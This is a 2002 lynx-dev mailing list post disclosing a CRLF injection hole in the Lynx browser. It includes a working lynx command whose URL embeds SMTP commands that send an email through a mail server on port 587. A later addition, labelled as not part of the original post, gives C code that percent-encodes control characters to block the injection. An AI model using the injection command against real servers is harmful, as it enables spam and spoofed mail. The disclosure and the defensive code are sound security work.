Re: lynx-dev Lynx CRLF Injection (fwd)
From: Ulf Härnhammar
Subject: Re: lynx-dev Lynx CRLF Injection (fwd)
Date: Wed, 21 Aug 2002 19:57:56 +0200
User-agent: Mutt/1.3.28i
It is also possible to use this hole for communication with other types of
servers than HTTP servers:
$ lynx "http://mail.site1.st:587/ HTTP/1.0
HELO mail.site1.st
MAIL FROM: <address@hidden>
RCPT TO: <address@hidden>
DATA
From: address@hidden
To: address@hidden
Subject: This is..
This is an URL that sends an e-mail?
.
QUIT
"
You have to use the alternate port 587, because the normal port 25 is blocked.
The MTA will complain about the "GET / HTTP/1.0" string, but it still works.
// Ulf Harnhammar
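
An added example, not part of the original post and not Lynx's own code: a client-side check in C that detects and percent-encodes control characters and spaces in a URL before it is copied into the request line, so the embedded line breaks in a URL like the one above reach the server as `%0D%0A` instead of as new protocol lines. The function names and the sample host `mail.example` are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

/* Constructed sample: a URL path carrying embedded CRLF-separated commands. */
#define SAMPLE "/ HTTP/1.0\r\nHELO mail.example\r\nQUIT\r\n"

/* A byte is unsafe if copying it verbatim could end or split the request
 * line: any control character (CR and LF included), space, or DEL. */
static int is_unsafe(unsigned char c)
{
    return c <= 0x20 || c == 0x7f;
}

/* Returns 1 if the URL contains at least one unsafe byte, else 0. */
int url_has_unsafe_bytes(const char *url)
{
    for (const unsigned char *p = (const unsigned char *)url; *p; p++)
        if (is_unsafe(*p))
            return 1;
    return 0;
}

/* Copies url into out, percent-encoding every unsafe byte.
 * Returns the encoded length, or -1 if out is too small. */
int url_encode_unsafe(const char *url, char *out, size_t outsz)
{
    static const char hex[] = "0123456789ABCDEF";
    size_t n = 0;
    if (outsz == 0)
        return -1;
    for (const unsigned char *p = (const unsigned char *)url; *p; p++) {
        size_t need = is_unsafe(*p) ? 3 : 1;
        if (n + need >= outsz)          /* keep room for the final NUL */
            return -1;
        if (need == 3) {
            out[n++] = '%';
            out[n++] = hex[*p >> 4];
            out[n++] = hex[*p & 0x0f];
        } else {
            out[n++] = (char)*p;
        }
    }
    out[n] = '\0';
    return (int)n;
}

int main(void)
{
    char buf[256];
    if (url_has_unsafe_bytes(SAMPLE) && url_encode_unsafe(SAMPLE, buf, sizeof buf) > 0)
        printf("GET %s HTTP/1.0\r\n\r\n", buf);   /* one request line only */
    return 0;
}
```

A stricter client can refuse the URL outright whenever `url_has_unsafe_bytes` returns 1 instead of encoding it.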